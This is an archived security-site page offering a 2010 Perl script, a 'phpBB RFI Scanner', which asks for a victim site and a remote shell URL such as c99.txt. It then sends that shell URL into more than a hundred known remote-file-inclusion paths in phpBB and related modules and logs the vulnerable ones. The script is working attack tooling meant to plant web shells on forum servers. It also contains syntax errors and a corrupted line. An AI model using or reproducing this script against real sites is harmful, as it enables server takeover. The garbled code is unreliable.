what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpBB RFI Scanner 27.9

phpBB RFI Scanner 27.9
Posted Oct 27, 2010
Authored by jos_ali_joe

This is a phpBB remote file inclusion scanner written in Perl.

tags | tool, remote, scanner, perl, file inclusion
systems | unix
SHA-256 | 93a467b53eb62570fc5e92ff28d8edecb743efdb81ac154adda4586ccb58ad9c

phpBB RFI Scanner 27.9

Change Mirror Download
#!/usr/bin/perl

############################################################
#RFI Scanner Perl PHPbb - v27.9 #
#Coded by jos_ali_joe RFI Scanner Perl #
#Indonesian Docer Team #
#Contact: josalijoe@yahoo.com #
#Explore Crew - Indonesian Coder - Devilz COde - IH - HN #
#ATEN4 : N4ck0 - Aury - TeRRenJr - aphe-aphe - Rafael #
############################################################

use HTTP::Request;
use LWP::UserAgent;

sub lw
{

my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title RFI Scanner Perl PHPbb - v27.9 ");
system ("color 02");
}
}

&lw;

print "\t\t########################################################\n\n";
print "\t\t## RFI Scanner PHPbb v27.9 IDC ##\n\n";
print "\t\t## by jos_ali_joe ##\n\n";
print "\t\t## special thanks : gunslinger_ Mywisdom ##\n\n";
print "\t\t########################################################\n\n";


print "Insert host:(ex: http://www.maho.com/)\n";
$host=<STDIN>;
chomp $host;
print "\n";

# If the url doesn't have http: at the beginning
if ( $host !~ /^http:/ ) {

# we add it
$host = 'http://' . $host;
}

# If the url doesn't have / at the end
if ( $host !~ //$/ ) {

# we add it
$host = $host . '/';
}


print "Insert shell:(ex: http://www.maho.com/c99.txt)\n";
$shell=<STDIN>;
chomp $shell;
print "\n";

# If the url doesn't have http: at the beginning
if ( $shell !~ /^http:/ ) {

# we add it
$shell = 'http://' . $shell;
}


print "Insert string search:(ex: c99shell)\n";
$string=<STDIN>;
chomp $string;
print "\n\n";

print "Your config:\n\n";

print " Victim: $host \n";
print " Url Shell: $shell \n";
print " Search String: $string \n\n";

print "Scan...\n\n";

$vuln1="/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=";
$vuln2="/includes/functions_portal.php?phpbb_root_path=";
$vuln3="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln4="/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=";
$vuln5="administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=";
$vuln6="/language/lang_german/lang_main_album.php?phpbb_root_path=";
$vuln7="/link_main.php?phpbb_root_path=";
$vuln8="/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=";
$vuln9="MOD_forum_fields_parse.php?phpbb_root_path=";
$vuln10="/codebb/pass_code.php?phpbb_root_path=";
$vuln11="/codebb/lang_select?phpbb_root_path=";
$vuln12="/includes/functions_nomoketos_rules.php?phpbb_root_path=";
$vuln13="/includes/functions.php?phpbb_root_path=";
$vuln14="/admin/admin_forum_prune.php?phpbb_root_path=";
$vuln15="/ezconvert/config.php?ezconvert_dir=";
$vuln16="/includes/class_template.php?phpbb_root_path=";
$vuln17="/includes/usercp_viewprofile.php?phpbb_root_path=";
$vuln18="/includes/functions.php?phpbb_root_path=";
$vuln19="/menu.php?sesion_idioma=";
$vuln20="/includes/functions.php?phpbb_root_path=";
$vuln21="/admin/admin_linkdb.php?phpbb_root_path=";
$vuln22="/admin/admin_extensions.php?phpbb_root_path=";
$vuln23="/admin/admin_board.php?phpbb_root_path=";
$vuln24="/admin/admin_attachments.php?phpbb_root_path=";
$vuln25="/admin/admin_users.php?phpbb_root_path=";
$vuln26="/includes/archive/archive_topic.php?phpbb_root_path=";
$vuln28="/admin/modules_data.php?phpbb_root_path=";
$vuln29="/faq.php?foing_root_path=";
$vuln30="/index.php?foing_root_path=";
$vuln31="/list.php?foing_root_path=";
$vuln32="/login.php?foing_root_path=";
$vuln33="/playlist.php?foing_root_path=";
$vuln34="/song.php?foing_root_path=";
$vuln35="/gen_m3u.php?foing_root_path=";
$vuln36="/view_artist.php?foing_root_path=";
$vuln37="/view_song.php?foing_root_path=";
$vuln38="/login.php?foing_root_path=";
$vuln39="/flash/set_na.php?foing_root_path=";
$vuln40="/flash/initialise.php?foing_root_path=";
$vuln41="/flash/get_song.php?foing_root_path=";
$vuln42="/includes/common.php?foing_root_path=";
$vuln43="/admin/nav.php?foing_root_path=";
$vuln44="/admin/main.php?foing_root_path=";
$vuln45="/admin/list_artists.php?foing_root_path=";
$vuln46="/admin/index.php?foing_root_path=";
$vuln47="/admin/genres.php?foing_root_path=";
$vuln48="/admin/edit_artist.php?foing_root_path=";
$vuln49="/admin/edit_album.php?foing_root_path=";
$vuln50="/admin/config.php?foing_root_path=";
$vuln51="/admin/admin_status.php?foing_root_path=";
$vuln52="language/lang_english/lang_prillian_faq.php?phpbb_root_path=";
$vuln53="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln54="/language/lang_french/lang_prillian_faq.php?phpbb_root_path=";
$vuln55="/includes/archive/archive_topic.php?phpbb_root_path=";
$vuln56="/functions_rpg_events.php?phpbb_root_path=";
$vuln57="/admin/admin_spam.php?phpbb_root_path=";
$vuln58="/includes/functions_newshr.php?phpbb_root_path=";
$vuln59="/zufallscodepart.php?phpbb_root_path=";
$vuln60="/mods/iai/includes/constants.php?phpbb_root_path=";
$vuln61="/root/includes/antispam.php?phpbb_root_path=";
$vuln62="/phpBB2/shoutbox.php?phpbb_root_path=";
$vuln63="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln64="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln65="/includes/journals_delete.php?phpbb_root_path=";
$vuln66="/includes/journals_post.php?phpbb_root_path=";
$vuln67="/includes/journals_edit.php?phpbb_root_path=";
$vuln68="/includes/functions_num_image.php?phpbb_root_path=";
$vuln69="/includes/functions_user_viewed_posts.php?phpbb_root_path=";
$vuln70="/includes/themen_portal_mitte.php?phpbb_root_path=";
$vuln71="/includes/logger_engine.php?phpbb_root_path=";
$vuln72="/includes/logger_engine.php?phpbb_root_path=";
$vuln73="/includes/functions_static_topics.php?phpbb_root_path=";
$vuln74="/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=";
$vuln75="/includes/functions_kb.php?phpbb_root_path=";
$vuln76="/includes/bbcb_mg.php?phpbb_root_path=";
$vuln77="/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=";
$vuln78="/includes/pafiledb_constants.php?module_root_path=";
$vuln79="/index.php?phpbb_root_path=";
$vuln80="/song.php?phpbb_root_path=";
$vuln81="/faq.php?phpbb_root_path=";
$vuln82="/list.php?phpbb_root_path=";
$vuln83="/gen_m3u.php?phpbb_root_path=";
$vuln84="/playlist.php?phpbb_root_path=";
$vuln85="/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln86="/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln87="/blend_data/blend_common.php?phpbb_root_path=";
$vuln88="/blend_data/blend_common.php?phpbb_root_path=";
$vuln89="/modules/Forums/admin/index.php?phpbb_root_path=";
$vuln90="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=";
$vuln91="/modules/Forums/admin/admin_board.php?phpbb_root_path=";
$vuln92="/modules/Forums/admin/admin_disallow.php?phpbb_root_path=";
$vuln93="/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=";
$vuln94="/modules/Forums/admin/admin_groups.php?phpbb_root_path=";
$vuln95="/modules/Forums/admin/admin_ranks.php?phpbb_root_path=";
$vuln96="/modules/Forums/admin/admin_styles.php?phpbb_root_path=";
$vuln97="/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=";
$vuln98="/modules/Forums/admin/admin_words.php?phpbb_root_path=";
$vuln99="/modules/Forums/admin/admin_avatar.php?phpbb_root_path=";
$vuln100="/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=";
$vuln101="/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=";
$vuln102="/modules/Forums/admin/admin_forums.php?phpbb_root_path=";
$vuln103="/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=";
$vuln104="/modules/Forums/admin/admin_smilies.php?phpbb_root_path=";
$vuln105="$vuln58="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=";
$vuln106="/modules/Forums/admin/admin_users.php?phpbb_root_path=";
$vuln107="/stat_modules/users_age/module.php?phpbb_root_path=";
$vuln108="/includes/functions_cms.php?phpbb_root_path=";
$vuln109="/m2f/m2f_phpbb204.php?m2f_root_path=";
$vuln110="/m2f/m2f_forum.php?m2f_root_path=";
$vuln111="/m2f/m2f_mailinglist.php?m2f_root_path=";
$vuln112="/m2f/m2f_cron.php?m2f_root_path=";
$vuln113="/lib/phpbb.php?subdir=";
$vuln114="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln115="/includes/functions.php?phpbb_root_path=";
$vuln116="/includes/functions_portal.php?phpbb_root_path=";
$vuln117="/includes/functions.php?phpbb_root_path=";
$vuln118="/includes/functions_admin.php?phpbb_root_path=";
$vuln119="/toplist.php?f=toplist_top10&phpbb_root_path=";
$vuln120="/admin/addentry.php?phpbb_root_path=";
$vuln121="/includes/kb_constants.php?module_root_path=";
$vuln122="/auth/auth.php?phpbb_root_path=";
$vuln123="/auth/auth_phpbb/phpbb_root_path=";
$vuln124="/auction/auction_common.php?phpbb_root_path=";
$vuln125="/auth/auth_SMF/smf_root_path=";
$vuln126="/auth/auth.php?smf_root_path=";

for ($i=1;$i<59;$i++)

{

$cont=vuln.$i;
chomp $cont;

print "$cont\n";

$final=$host.$$cont."$shell?";
my $req=HTTP::Request->new(GET=>$final alias selesai);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if ($response->is_success) {
if( $response->content =~ /$string/){
open(FILE,">>results.txt");
print FILE "$final\n";
close(FILE);
print "-------------------------------------------------\n";
print "$final\n";
print "IS VULNZ..\n";
print "-------------------------------------------------\n";
}}

}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close